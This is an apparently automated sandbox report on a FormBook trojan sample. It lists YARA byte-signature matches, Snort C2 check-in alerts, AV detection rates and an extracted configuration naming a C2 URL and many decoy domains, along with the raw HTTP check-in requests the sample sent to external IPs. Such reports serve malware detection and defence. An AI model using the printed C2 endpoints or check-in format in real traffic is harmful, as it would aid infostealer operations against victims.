0.2.1.exe.3fbfe60.5.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x195158:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1954e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1bc578:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1bc902:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1a11f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1c8615:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1a0ce1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1c8101:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1a12f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1c8717:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1a146f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1c888f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x195efa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1bd31a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x19ff5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1c737c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x196c72:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1be092:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a62e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1cd707:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a738a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.1.exe.3fbfe60.5.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a3219:$sqlite3step: 68 34 1C 7B E1 0x1a332c:$sqlite3step: 68 34 1C 7B E1 0x1ca639:$sqlite3step: 68 34 1C 7B E1 0x1ca74c:$sqlite3step: 68 34 1C 7B E1 0x1a3248:$sqlite3text: 68 38 2A 90 C5 0x1a336d:$sqlite3text: 68 38 2A 90 C5 0x1ca668:$sqlite3text: 68 38 2A 90 C5 0x1ca78d:$sqlite3text: 68 38 2A 90 C5 0x1a325b:$sqlite3blob: 68 53 D8 7F 8C 0x1a3383:$sqlite3blob: 68 53 D8 7F 8C 0x1ca67b:$sqlite3blob: 68 53 D8 7F 8C 0x1ca7a3:$sqlite3blob: 68 53 D8 7F 8C
0.2.1.exe.4009280.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.1.exe.4009280.3.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.1.exe.4009280.3.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1498c1:$a1: 3C 30 50 4F 53 54 74 09 40 0x170ce1:$a1: 3C 30 50 4F 53 54 74 09 40 0x15e200:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x185620:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x14cf0f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17432f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x157fd7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x17f3f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.1.exe.4009280.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x14bd38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14c0c2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x173158:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1734e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157dd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17f1f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1578c1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17ece1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157ed7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17f2f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15804f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x17f46f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x14cada:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x173efa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x156b3c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x17df5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x14d852:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x174c72:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x15cec7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1842e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x15df6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.1.exe.4009280.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x159df9:$sqlite3step: 68 34 1C 7B E1 0x159f0c:$sqlite3step: 68 34 1C 7B E1 0x181219:$sqlite3step: 68 34 1C 7B E1 0x18132c:$sqlite3step: 68 34 1C 7B E1 0x159e28:$sqlite3text: 68 38 2A 90 C5 0x159f4d:$sqlite3text: 68 38 2A 90 C5 0x181248:$sqlite3text: 68 38 2A 90 C5 0x18136d:$sqlite3text: 68 38 2A 90 C5 0x159e3b:$sqlite3blob: 68 53 D8 7F 8C 0x159f63:$sqlite3blob: 68 53 D8 7F 8C 0x18125b:$sqlite3blob: 68 53 D8 7F 8C 0x181383:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 20 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 34.149.87.45

Timestamp:	192.168.2.534.149.87.4549725802031412 11/21/23-03:33:45.473798
SID:	2031412
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 167.172.69.40

Timestamp:	192.168.2.5167.172.69.4049719802031412 11/21/23-03:32:02.056719
SID:	2031412
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 23.227.38.74

Timestamp:	192.168.2.523.227.38.7449718802031412 11/21/23-03:31:50.310124
SID:	2031412
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 34.149.87.45

Timestamp:	192.168.2.534.149.87.4549713802031412 11/21/23-03:30:48.646835
SID:	2031412
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 23.227.38.74

Timestamp:	192.168.2.523.227.38.7449723802031412 11/21/23-03:33:19.042134
SID:	2031412
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 217.160.0.167

Timestamp:	192.168.2.5217.160.0.16749715802031412 11/21/23-03:31:13.651241
SID:	2031412
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 23.227.38.74

Timestamp:	192.168.2.523.227.38.7449722802031412 11/21/23-03:32:47.926567
SID:	2031412
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 167.172.69.40

Timestamp:	192.168.2.5167.172.69.4049712802031412 11/21/23-03:30:32.559422
SID:	2031412
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 34.149.87.45

Timestamp:	192.168.2.534.149.87.4549720802031412 11/21/23-03:32:18.840591
SID:	2031412
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 217.160.0.167

Timestamp:	192.168.2.5217.160.0.16749721802031412 11/21/23-03:32:42.602914
SID:	2031412
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 167.172.69.40

Timestamp:	192.168.2.5167.172.69.4049724802031412 11/21/23-03:33:29.744408
SID:	2031412
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 23.227.38.74

Timestamp:	192.168.2.523.227.38.7449716802031412 11/21/23-03:31:19.303012
SID:	2031412
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 217.160.0.167

Timestamp:	192.168.2.5217.160.0.16749726802031412 11/21/23-03:34:08.968993
SID:	2031412
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.switchtoambitwithmirtha.com/jskg/"], "decoy": ["jajaten.com", "pnorg.net", "rccarquibogota.com", "marcomarabiamea.com", "theligue.com", "mdearpet.com", "barokahsrivillage.com", "wisdomtoothguru.com", "srteamsex.com", "erotictoybox.com", "278698.com", "victimaccidents.com", "bootyfashions.com", "stomasto.site", "canalysisconsulting.com", "printandmail.legal", "bestcureforbackpain.com", "apanifitness.com", "smartabletech.com", "facialsteamerofficial.com", "cookclassesfishes.com", "ayanmobile.com", "cannapharmaus.com", "lactationdrink.com", "enrgsystems.info", "f1leghecodemasters.net", "topazkibblez.com", "appbecause.com", "256barrington.com", "snapmoneyexchangellc.com", "kriolland.com", "7255399.com", "realoneathletics.info", "illustriousevents.com", "moonman.services", "dog2meeting.com", "successwithyolandafgreen.com", "freshlookconsulting.net", "3bcreditwatch.com", "lacroixundkress.com", "beaujolaisboston.com", "breakawayfc.com", "bollmasonry.com", "jiujitsuspa.com", "zirangaobai.com", "capitalmedicalsupplies.net", "swavhca.com", "pereiranatalia.com", "lbarco.com", "revistabrasileiramarketing.info", "carportaccessory.com", "kvrkl.com", "handledlife.com", "groups-post-sales-2678493.xyz", "rapidprintz.com", "buzzkeel.com", "divinityemerald.com", "ppc-listing.info", "coryfireshop.com", "mimipopuppicnics.com", "votehealey.com", "saraadamchak.com", "winwinwin365.net", "tprmt.com"]}

Multi AV Scanner detection for submitted file

Source: 1.exe	ReversingLabs: Detection: 92%
Source: 1.exe	Virustotal: Detection: 82%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Antivirus / Scanner detection for submitted sample

Source: 1.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.lactationdrink.com	Avira URL Cloud: Label: malware
Source: http://www.ppc-listing.info/jskg/www.pnorg.net	Avira URL Cloud: Label: malware
Source: http://www.ppc-listing.info/jskg/	Avira URL Cloud: Label: malware
Source: http://www.lactationdrink.com/jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M	Avira URL Cloud: Label: malware
Source: http://www.ppc-listing.info	Avira URL Cloud: Label: malware
Source: http://www.lactationdrink.com/jskg/www.wisdomtoothguru.com	Avira URL Cloud: Label: malware
Source: http://www.lactationdrink.com/jskg/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://www.switchtoambitwithmirtha.com/jskg/

Virustotal: Detection: 6%

Perma Link

Machine Learning detection for sample

Source: 1.exe

Joe Sandbox ML: detected

Source: 1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: colorcpl.pdbGCTL source: 1.exe, 00000002.00000002.2046399747.0000000001520000.00000040.10000000.00040000.00000000.sdmp, 1.exe, 00000002.00000002.2046273682.0000000001297000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449033353.0000000000E00000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: colorcpl.pdb source: 1.exe, 00000002.00000002.2046399747.0000000001520000.00000040.10000000.00040000.00000000.sdmp, 1.exe, 00000002.00000002.2046273682.0000000001297000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449033353.0000000000E00000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 1.exe, 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2047949861.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2045475462.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 1.exe, 1.exe, 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000004.00000003.2047949861.0000000004C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000003.2045475462.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\1.exe	Code function: 4x nop then pop edi		2_2_004155FB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4x nop then pop edi		4_2_02E355FB

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 167.172.69.40 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.160.0.167 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.149.87.45 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 167.172.69.40:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49713 -> 34.149.87.45:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 217.160.0.167:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49716 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 167.172.69.40:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.149.87.45:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49721 -> 217.160.0.167:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49722 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49723 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49724 -> 167.172.69.40:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 34.149.87.45:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 217.160.0.167:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.switchtoambitwithmirtha.com/jskg/

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: www.revistabrasileiramarketing.info replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.dog2meeting.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.successwithyolandafgreen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.topazkibblez.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.bootyfashions.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.kvrkl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.switchtoambitwithmirtha.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.wisdomtoothguru.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.coryfireshop.com replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: www.pnorg.net replaycode: Name error (3)

Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1Host: www.saraadamchak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1Host: www.erotictoybox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1Host: www.saraadamchak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1Host: www.erotictoybox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 23.227.38.74 23.227.38.74

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1236date: Tue, 21 Nov 2023 02:30:32 GMTserver: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 21 Nov 2023 02:31:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 21 Nov 2023 02:31:34 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OJeXESvsWpjrZzOUy1Rc7a2iN2AFTLD1eAvr87EhZY1qyoaUL8DeQgfYbS2%2F45fy%2FfR%2BJLMCGgPSAnC3CtsgIz9PDF%2Fv2Svcr5EszY8hHtQRDAuw9OAnVY%2FE%2Bd75ZhOXA2OohC%2FI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=34.999847Server: cloudflareCF-RAY: 82958409eace2012-IADalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 